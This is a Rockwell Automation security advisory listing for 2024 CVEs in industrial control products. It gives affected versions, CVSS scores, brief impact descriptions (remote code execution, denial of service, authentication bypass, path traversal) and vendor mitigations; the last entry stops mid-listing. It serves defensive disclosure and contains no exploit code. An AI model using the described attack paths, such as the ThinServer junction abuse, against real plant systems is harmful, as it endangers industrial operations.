The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product

Affected Software Versions

Corrected in Software Version

AADvance® Trusted® SIS Workstation

2.00.01 and earlier

2.00.02

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2023-31102 IMPACT

A vulnerability exists which could allow remote threat actors to execute arbitrary code on affected installations of 7-Zip. User interaction is required to exploit this vulnerability because the target must visit a malicious page or open a malicious file.

The specific vulnerability exists in the analysis of 7Z files. The problem results from the lack of proper validation of user-supplied data, which can lead to an integer underflow before writing to memory. A threat actor can exploit this vulnerability to execute code in the context of the current process.

CVSS 3.1 Base Score: 7.8
CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CWE:  CWE-20: Improper Input Validation
Known Exploited Vulnerability (KEV) database: No

CVE-2023-40481 IMPACT

 A SquashFS File Parsing Out-Of-Bounds Write Remote Code Execution exists in 7-Zip that allows remote threat actors to execute arbitrary code on affected installations of 7-Zip. User interaction is also required to exploit this vulnerability, as the target must visit a malicious page or open a malicious file.

The specific vulnerability arises during the analysis of SQFS files due to the lack of proper validation of user-supplied data. This can cause a write operation to exceed the end of an allocated buffer. A threat actor can exploit this vulnerability to execute code in the context of the current process.

CVSS 3.1 Base Score: 7.8
CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CWE:  CWE-20: Improper Input Validation
Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds
Customers using the affected software are encouraged to apply the risk mitigations, if possible.

·         Do not archive or restore projects from unknown sources.

·         For information on how to mitigate Security Risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

ADDITIONAL RESOURCES

·         JSON CVE-2023-31102

·         JSON CVE-2023-40481

Critical
SD1696 | FactoryTalk® View Site Edition Remote Code Execution Vulnerability via Lack of Input Validation
Published Date:
September 12, 2024
Last Updated:
November 13, 2024
CVE IDs:
CVE-2024-45824
CVSS Scores (v3.1):
9.8
CVSS Scores (v4.0):
9.2
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No
Más información Less Details Chevron DownChevron Down

Published Date: 9/12/2024
Last Updated: 9/12/2024
Revision Number: 1.0
CVSS Score: v3.1: 9.8/10, v4.0: 9.2/10

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product

Affected Software Versions

Corrected in Software Version

FactoryTalk® View Site Edition

V12.0, V13.0, V14.0

Patches available here

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2024-45824 IMPACT

A remote code vulnerability exists in the affected products. The vulnerability occurs when chained with Path Traversal, Command Injection, and XSS Vulnerabilities and allows for full unauthenticated remote code execution. The link in the mitigations section below contains patches to fix this issue.

CVSS 3.1 Base Score: 9.8
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 9.2
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE:  CWE-77: Improper Neutralization of Special Elements used in a Command
Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds
Customers using the affected software are encouraged to apply the risk mitigations, if possible.

·         Navigate to the following link and apply patches, directions are on the link page

·         For information on how to mitigate Security Risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

ADDITIONAL RESOURCES

·         JSON CVE-2024-45824

High
SD1695 | Incorrect Privileges and Path Traversal Vulnerability in Pavilion8®
Published Date:
September 11, 2024
Last Updated:
October 16, 2024
CVE IDs:
CVE-2024-7960 , CVE-2024-7961
CVSS Scores (v3.1):
7.6, 7.2
CVSS Scores (v4.0):
8.8, 8.6
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No
Más información Less Details Chevron DownChevron Down

Published Date: 9/12/24 
Revision Number: 1.0 
CVSS Score: 3.1: 7.6, 7.2 4.0: 8.8, 7.6 

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments. 

AFFECTED PRODUCTS AND SOLUTION 

Affected Product  Affected Software Version  Corrected in Software Version 
Pavilion8®            <V5.20  V6.0 and later  

 

VULNERABILITY DETAILS 

Rockwell Automation used the latest versions of the CVSS scoring system to assess the vulnerabilities. 

CVE-2024-7960 IMPACT 

The affected product contains a vulnerability that allows a threat actor to view sensitive information and change settings. The vulnerability exists due to having an incorrect privilege matrix that allows users to have access to functions they should not.  

CVSS 3.1 Base Score: 7.6 
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L 

CVSS 4.0 Base Score: 8.8 
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:L/SC:N/SI:N/SA:N 

CWE:  Improper Privilege Management 
Known Exploited Vulnerability (KEV) database: No 

CVE-2024-7961 IMPACT 

A path traversal vulnerability exists in the affected product.  If exploited, the threat actor could upload arbitrary files to the server that could result in a remote code execution.   

CVSS 3.1 Base Score: 7.2 
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H 

CVSS 4.0 Base Score: 8.6 
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N 

CWE:  Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') 
Known Exploited Vulnerability (KEV) database: No 

Mitigations and Workarounds 
Customers using the affected software, who are not able to upgrade to one of the corrected versions, are encouraged to apply security best practices, where possible.    

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization. 

ADDITIONAL RESOURCES 

High
SD1694 | OptixPanel™ Privilege Escalation Vulnerability via File Permissions
Published Date:
September 10, 2024
Last Updated:
November 13, 2024
CVE IDs:
CVE-2024-8533
CVSS Scores (v3.1):
7.5
CVSS Scores (v4.0):
7.7
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No
Más información Less Details Chevron DownChevron Down

Published Date: 9/12/2024

Last Updated: 9/12/2024 

Revision Number: 1.0 
CVSS Score: v3.1: 7.5/10, v4.0: 7.7/10

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improving their business or production environments.

AFFECTED PRODUCTS AND SOLUTION

 

 

Affected Product

 

 

 

 

First Known in Software Version

 

 

 

 

Corrected in Software Version

 

 

 

 

2800C OptixPanel™ Compact

 

 

 

 

4.0.0.325

 

 

 

 

4.0.2.116

 

 

 

 

2800S OptixPanel™ Standard

 

 

 

 

4.0.0.350

 

 

 

 

4.0.2.123

 

 

 

 

Embedded Edge Compute Module

 

 

 

 

4.0.0.347

 

 

 

 

4.0.2.106

 

 

 

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2024-8533 IMPACT

A privilege escalation vulnerability exists in the affected product. The vulnerability occurs due to improper default file permissions allowing users to exfiltrate credentials and escalate privileges.

CVSS 3.1 Base Score: 7.5 
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 7.7 
CVSS Vector: CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE: CWE-269: Improper Privilege Management 
Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds 
Customers using the affected software are encouraged to apply security best practices

  • For information on how to mitigate Security Risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

ADDITIONAL RESOURCES

 

High
SD1693 | ControlLogix/GuardLogix 5580 and CompactLogix/Compact GuardLogix® 5380 Vulnerable to DoS vulnerability via CIP
Published Date:
September 10, 2024
Last Updated:
November 13, 2024
CVE IDs:
CVE-2024-6077
CVSS Scores (v3.1):
7.5
CVSS Scores (v4.0):
8.7
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Published Date: 9/12/2024

Updated Date: 9/12/2024 

Revision Number: 1.0

CVSS: v3.1: 7.4, 4.0: 8.3

 

The security of our products is important to us as your chosen industrial automation supplier.  This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improving your business or production environments.

 

AFFECTED PRODUCTS AND SOLUTION

 

 

Affected Family 

 

 

 

 

First Known in Software/Firmware Version

 

 

 

 

Corrected in Software/Firmware Version

 

 

 

 

CompactLogix 5380

 

 

 

 

 

 

 

v.32 .011

 

 

 

 

v33.017, v34.014, v35.013, v36.011 and later

 

 

 

 

CompactLogix 5380 Process 

 

 

 

 

v.33.011

 

 

 

 

v33.017, v34.014, v35.013, v36.011 and later

 

 

 

 

Compact GuardLogix 5380 SIL 2 

 

 

 

 

v.32.013

 

 

 

 

v33.017, v34.014, v35.013, v36.011 and later

 

 

 

 

Compact GuardLogix 5380 SIL 3 

 

 

 

 

v.32.011

 

 

 

 

v33.017, v34.014, v35.013, v36.011 and later

 

 

 

 

CompactLogix 5480 

 

 

 

 

v.32.011

 

 

 

 

v33.017, v34.014, v35.013, v36.011 and later

 

 

 

 

ControlLogix® 5580 

 

 

 

 

v.32.011

 

 

 

 

v33.017, v34.014, v35.013, v36.011 and later

 

 

 

 

ControlLogix® 5580 Process 

 

 

 

 

v.33.011

 

 

 

 

v33.017, v34.014, v35.013, v36.011 and later

 

 

 

 

GuardLogix 5580 

 

 

 

 

v.32.011

 

 

 

 

v33.017, v34.014, v35.013, v36.011 and later

 

 

 

 

1756-EN4

 

 

 

 

v2.001

 

 

 

 

v6.001 and later

 

 

 

VULNERABILITY DETAILS

 Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2024-6077 IMPACT

A denial-of-service vulnerability exists in the affected products when specially crafted packets are sent to the CIP Security Object. If exploited the device will become unavailable and require a factory reset to recover. 

CVSS Base Score: 7.5 
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVSS Base Score: 8.7 
CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N 
CWE-20:  Improper Input Validation 
Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds 
Customers who are unable to upgrade to the corrected software versions are encouraged to apply the following risk mitigations. 

  • Users who do not wish to use CIP security can disable the feature per device. See "Disable CIP Security" in Chapter 2 of "CIP Security with Rockwell Automation Products" (publication SECURE-AT001)

For information on how to mitigate Security Risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability. Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

ADDITIONAL RESOURCES

The following link provides CVE information in Vulnerability Exploitability Exchange (VEX) format, which is machine readable and can be used to automate vulnerability management and tracking activities.   

    JSON CVE-2024-6077

Critical
SD1692 | ThinManager® ThinServer™ Information Disclosure and Remote Code Execution Vulnerabilities
Published Date:
August 21, 2024
Last Updated:
November 19, 2024
CVE IDs:
CVE-2024-7986, CVE 2024-7987, CVE 2024 -7988
CVSS Scores (v3.1):
5.5, 7.8, 9.8
CVSS Scores (v4.0):
6.8, 8.5, 9.3
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No
Más información Less Details Chevron DownChevron Down

Published Date: 8/22/24

Last updated: 8/22/24

Revision Number: 1.0

CVSS Score: v3.1: 5.5, 7.8, 9.8, v4.0: 6.8, 8.5, 9.3

AFFECTED PRODUCTS AND SOLUTION

Affected Product

First Known in software version

Corrected in software version

ThinManager® ThinServer™

11.1.0-11.1.7
11.2.0-11.2.8
12.0.0-12.0.6
12.1.0-12.1.7
13.0.0-13.0.4
13.1.0-13.1.2
13.2.0-13.2.1

11.1.8

11.2.9

12.0.7

12.1.8

13.0.5

13.1.3

13.2.2

VULNERABILITY DETAILS

Rockwell Automation used version 3.1 and 4.0 of the CVSS scoring system to assess the following vulnerabilities. The following vulnerabilities were reported by Nicholas Zubrisky of Trend Micro Security Research.

CVE-2024-7986 IMPACT

A vulnerability exists in the affected products that allows a threat actor to disclose sensitive information. A threat actor can exploit this vulnerability by abusing the ThinServer™ service to read arbitrary files by creating a junction that points to the target directory.

CVSS Base Score v3.1: 5.5/10

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

CVSS Base Score v4.0: 6.8/10

CVSS Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N

CWE: CWE-269 Improper Privilege Management

Known Exploited Vulnerability (KEV) database:  No

 

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

 

CVE-2024-7987 IMPACT

A remote code execution vulnerability exists in the affected products that allows a threat actor to execute arbitrary code with System privileges. To exploit this vulnerability and a threat actor must abuse the ThinServer™ service by creating a junction and use it to upload arbitrary files.

CVSS Base Score v3.1: 7.8/10

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVSS Base Score v4.0: 8.5/10

CVSS Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE: CWE-732: Incorrect Permission Assignment for Critical Resource

 

CVE-2024-7988 IMPACT

A remote code execution vulnerability exists in the affected products that allows a threat actor to execute arbitrary code with System privileges. This vulnerability exists due to the lack of proper data input validation, which allows files to be overwritten.

CVSS Base Score v3.1: 9.8/10

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS Base Score v4.0: 9.3/10

CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE: CWE-20: Improper Input Validation

Mitigations and Workarounds

Customers using the affected software are encouraged to implement our suggested security best practices to minimize the risk of vulnerability.

·       Security Best Practices

 ADDITIONAL RESOURCES

·       JSON CVE-2024-7986

·       JSON CVE 2024-7987

·       JSON CVE 2024 -7988

High
SD1689 | AADvance® Standalone OPC-DA Server Code Execution Vulnerability via Vulnerable Component
Published Date:
August 13, 2024
Last Updated:
November 19, 2024
CVE IDs:
CVE-2018-1285, CVE-2006-0743
CVSS Scores (v3.1):
7.5, 5.3
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No
Más información Less Details Chevron DownChevron Down

Published Date: August 13, 2024 
Last updated: August 13, 2024

Revision Number: 1.0

CVSS Score: Please see below

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.  

AFFECTED PRODUCTS AND SOLUTION

Affected Product

First Known in Software Version

Corrected in Software Version

AADvance® Standalone OPC-DA Server

v2.01.510

v2.02 and later

VULNERABILITY DETAILS

CVE IMPACT

An arbitrary code execution vulnerability exists in the affected product. The vulnerability occurs due to a vulnerable component, Log4Net v1.2, which has multiple vulnerabilities listed below:

  • CVE-2018-1285, CVSS score 7.5 - log4net config file does not disable XML external entities
    • CVSS Base Score: 7.5
    • CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 
    • CWE-20:  Improper Input Validation 
    • Known Exploited Vulnerability (KEV) database: None
  • CVE-2006-0743, CVSS score 5.3 - format string vulnerability in log4net
    • CVSS Base Score: 5.3 
    • CVSS Vector:  CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L 
    • CWE-134:  Use of Externally Controlled Format String
    • Known Exploited Vulnerability (KEV) database: None

Mitigations and Workarounds 
Customers using the affected software are encouraged to apply the risk mitigations, if possible.

  • For information on how to mitigate Security Risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

ADDITIONAL RESOURCES

The following link provides CVE information in Vulnerability Exploitability Exchange (VEX) format, which is machine readable and can be used to automate vulnerability management and tracking activities.  

High
SD1687 | Authentication Bypass Vulnerability in DataMosaix™
Published Date:
August 13, 2024
Last Updated:
November 20, 2024
CVE IDs:
CVE-2024-6078
CVSS Scores (v3.1):
9.1
CVSS Scores (v4.0):
8.6
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Published Date: 8/13/2024

Updated Date: 8/13/2024 
Revision Number: 1.0

CVSS: v3.1: 9.1, v4.0: 8.6 

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improving your business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product First Known in Software Version Corrected in Software Version
DataMosaix™ Private Cloud

V7.07 <

v7.09 or later 

 

Mitigations and Workarounds

  • Customers using the affected software are encouraged to upgrade the DataMosaix™ Private Cloud software from V7.07 to V7.09. The application support team will work with respective customers to upgrade. 

For information on how to mitigate Security Risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

VULNERABILITY DETAIL

Rockwell Automation used version 3.1 and 4.0 of the CVSS scoring system to assess the following vulnerabilities.

CVE-2024-6078 IMPACT

An improper authentication vulnerability exists in the affected product, which could allow a malicious user to generate cookies for any user ID without the use of a username or password. If exploited, a malicious user could take over the account of a legitimate user. The malicious user would be able to view and modify data stored in the cloud. 

CVSS Base Score: 9.1  
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

CVSS Base Score: 8.6 
CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N 
CWE-287:  Improper Authentication 
Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

ADDITIONAL RESOURCES

The following link provides CVE information in Vulnerability Exploitability Exchange (VEX) format, which is machine readable and can be used to automate vulnerability management and tracking activities.   

High
SD1686 | ControlLogix/GuardLogix 5580 and CompactLogix/Compact GuardLogix® 5380 Controller Denial-of-Service Vulnerability via Input Validation
Published Date:
August 13, 2024
Last Updated:
November 19, 2024
CVE IDs:
CVE-2024-7515
CVSS Scores (v3.1):
8.6
CVSS Scores (v4.0):
8.7
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
Yes
Más información Less Details Chevron DownChevron Down

Published Date: August 13, 2024 
Last updated: September 13, 2024

Revision Number: 2.0

September 13, 2024 - Updated Affected Product and Solutions Table

CVSS Score: v3.1 8.6/10, v4.0 8.7/10

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improving your business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product First Known in firmware revision Corrected in firmware revision

CompactLogix 5380

v28.011

v34.014, v35.013, v36.011 and later

ControlLogix 5580

v28.011

 v34.014, v35.013, v36.011 and later

GuardLogix 5580

v31.011

v34.014, v35.013, v36.011 and later

Compact GuardLogix 5380 SIL2

v31.011

v34.014, v35.013, v36.011 and later

Compact GuardLogix 5380 SIL3

V32.013

v34.014, v35.013, v36.011 and later

CompactLogix 5480 

V32.011

v34.014, v35.013, v36.011 and later

Mitigations and Workarounds 
Customers using the affected software are encouraged to apply the following risk mitigations, if possible:

  • If PTP messages are not used, block at the network level, port UDP 319/320

  • For information on how to mitigate Security Risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2024-7515 IMPACT

A denial-of-service vulnerability exists in the affected products. A malformed PTP management packet can cause a major nonrecoverable fault in the controller.

CVSS 3.1 Base Score: 8.6 
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H

CVSS 4.0 Base Score: 8.7 
CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

CWE-20:  Improper Input Validation

Known Exploited Vulnerability (KEV) database: None

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization. 

ADDITIONAL RESOURCES

The following link provides CVE information in Vulnerability Exploitability Exchange (VEX) format, which is machine readable and can be used to automate vulnerability management and tracking activities.  

High
SD1688 | FactoryTalk® View Site Edition Code Execution Vulnerability via File Permissions
Published Date:
August 13, 2024
Last Updated:
November 19, 2024
CVE IDs:
CVE-2024-7513
CVSS Scores (v3.1):
8.8
CVSS Scores (v4.0):
8.5
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
Yes
Más información Less Details Chevron DownChevron Down

Published Date: 8/13/2024 
Last Updated: 8/27/2024 
Revision Number: 2
CVSS Score: v3.1: 8.8/10, v4.0: 8.5/10

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improving your business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product
 First Known in Software Version
 Corrected in Software Version
FactoryTalk® View SE

13.0

N/A

Mitigations and Workarounds 
Customers using the affected software are encouraged to apply security best practices, if possible.

  • By default, all HMI server projects are saved in the HMI projects folder on the HMI server computer located at C:\Users\Public\Documents\RSView Enterprise\SE\HMI projects. To enhance security and prevent unauthorized modifications to these projects, you can tighten the Windows folder's security settings on the HMI server computer by following these steps:
    • Remove the INTERACTIVE group from the folder’s security properties.
    • Add specific users or user groups and assign their permissions to this folder as needed.
    • If you assign read-only permission to those users or user groups, they can only view and will not be able to write to project files. Users with read-only permission can still test run and run the FactoryTalk® View SE client.

  • In Version 14: Open FactoryTalk® View Studio -> Help -> FactoryTalk® View SE Help -> In the Help file -> Security -> “HMI projects folder”

  • For information on how to mitigate Security Risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization. 

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2024-7513 IMPACT

A code execution vulnerability exists in the affected product. The vulnerability occurs due to improper default file permissions allowing any user to edit or replace files, which are executed by account with elevated permissions.

CVSS 3.1 Base Score: 8.8 
CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.5 
CVSS 4.0 Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE: CWE-732: Incorrect Permission Assignment for Critical Resource 
Known Exploited Vulnerability (KEV) database: No

ADDITIONAL RESOURCES

High
SD1690 | GuardLogix/ControlLogix 5580 Controller denial-of-service Vulnerability via Malformed Packet Handling
Published Date:
August 13, 2024
Last Updated:
September 13, 2024
CVE IDs:
CVE-2024-40619
CVSS Scores (v3.1):
7.5
CVSS Scores (v4.0):
8.7
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No
Más información Less Details Chevron DownChevron Down

Published Date: August 13, 2024 
Last updated: September 13, 2024

Revision Number: 2..0

September 13th, 2024 – Updated “Corrected in Firmware Versions”

CVSS Score: v3.1: 7.5/10, v4.0: 8.7/10

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.  

AFFECTED PRODUCTS AND SOLUTION

Affected Product

First Known in Firmware Version

Corrected in Firmware Version

ControlLogix® 5580

v34.011

v34.014, v35.011 and later

GuardLogix 5580

v34.011

v34.014, v35.011 and later

VULNERABILITY DETAILS

Rockwell Automation used version 3.1 and 4.0 of the CVSS scoring systems to assess the following vulnerabilities.  

CVE-2024-40619 IMPACT

A denial-of-service vulnerability exists in the affected products. The vulnerability occurs when a malformed CIP packet is sent over the network to the device and results in a major nonrecoverable fault causing a denial-of-service.

CVSS 3.1 Base Score: 7.5 
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVSS 4.0 Base Score: 8.7 
CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N 

CWE-754:  Improper Check for Unusual or Exceptional Conditions 

Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds 
Customers using the affected software are encouraged to apply the risk mitigations, if possible.

  • For information on how to mitigate Security Risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

ADDITIONAL RESOURCES

The following link provides CVE information in Vulnerability Exploitability Exchange (VEX) format, which is machine readable and can be used to automate vulnerability management and tracking activities. 

High
SD1691 | Pavilion8® Unencrypted Data Vulnerability via HTTP protocol
Published Date:
August 13, 2024
Last Updated:
November 13, 2024
CVE IDs:
CVE-2024-40620
CVSS Scores (v3.1):
7.4
CVSS Scores (v4.0):
5.3
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No
Más información Less Details Chevron DownChevron Down

Published Date: August 13, 2024 
Last updated: August 13, 2024

Revision Number: 1.0

CVSS Score: v3.1: 7.4/10, v4.0: 5.3/10

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product First Known in software version Corrected in software revision
Pavilion8® v5.20 v6.0

Mitigations and Workarounds 

Users using the affected software, who are not able to upgrade to one of the corrected versions, are encouraged to apply security best practices, where possible.   

  • Interactions between the Console and Dashboard take place on the same machine, the machine should exist behind a firewall and physical access should be limited to authorized personnel.

VULNERABILITY DETAILS

Rockwell Automation used version 3.1 and 4.0 of the CVSS scoring systems to assess the following vulnerabilities. 

CVE-2024-40620 IMPACT

A vulnerability exists in the affected product due to lack of encryption of sensitive information. The vulnerability results in data being sent between the Console and the Dashboard without encryption, which can be seen in the logs of proxy servers, potentially impacting the data's confidentiality.

CVSS 3.1 Base Score: 7.4/10  

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L

CSVV 4.0 Base Score: 5.3/10

CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N

CWE-311: Missing Encryption of Sensitive Data

Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment specific prioritization.

ADDITIONAL RESOURCES

The following link provides CVE information in Vulnerability Exploitability Exchange (VEX) format, which is machine readable and can be used to automate vulnerability management and tracking activities.    

Medium
SD1684 | Micro850/870 Vulnerable to denial-of-service Vulnerability via CIP/Modbus Port
Published Date:
August 12, 2024
Last Updated:
October 16, 2024
CVE IDs:
CVE 2024 7567
CVSS Scores (v3.1):
5.3
CVSS Scores (v4.0):
6.9
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No
Más información Less Details Chevron DownChevron Down

Micro850/870 Vulnerable to denial-of-service Vulnerability via CIP/Modbus Port

Published Date: 8/13/24

Last Updated: 8/13/2024

Revision Number: 1.0

CVSS Score: v3.1: 5.3/10, v4.0: 6.9/10

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments. 

AFFECTED PRODUCTS AND SOLUTION

Affected Product

First Known in Software Version

Corrected in Software Version

PLC - Micro850/870 (2080 -L50E/2080 -L70E)

v20.011

v22.011

VULNERABILITY DETAILS

Rockwell Automation used the latest versions of the CVSS scoring system to assess the following vulnerabilities.

CVE-2024-7567 IMPACT

A denial-of-service vulnerability exists via the CIP/Modbus port in the affected products. If exploited, the CIP/Modbus communication may be disrupted for short duration.

CVSS Base Score: 5.3
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

CVSS Base Score: 6.9
CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N
CWE: CWE-400: Uncontrolled Resource Consumption


Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds
Customers using the affected software are encouraged to apply security best practices, if possible.

·       For information on how to mitigate Security Risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

ADDITIONAL RESOURCES

·       CVE-2024-7567

Medium
SD1683 | DLL Hijacking Vulnerability Exists in Emulate3D™
Published Date:
August 12, 2024
Last Updated:
November 19, 2024
CVE IDs:
CVE-2024-6079
CVSS Scores (v3.1):
6.7
CVSS Scores (v4.0):
5.4
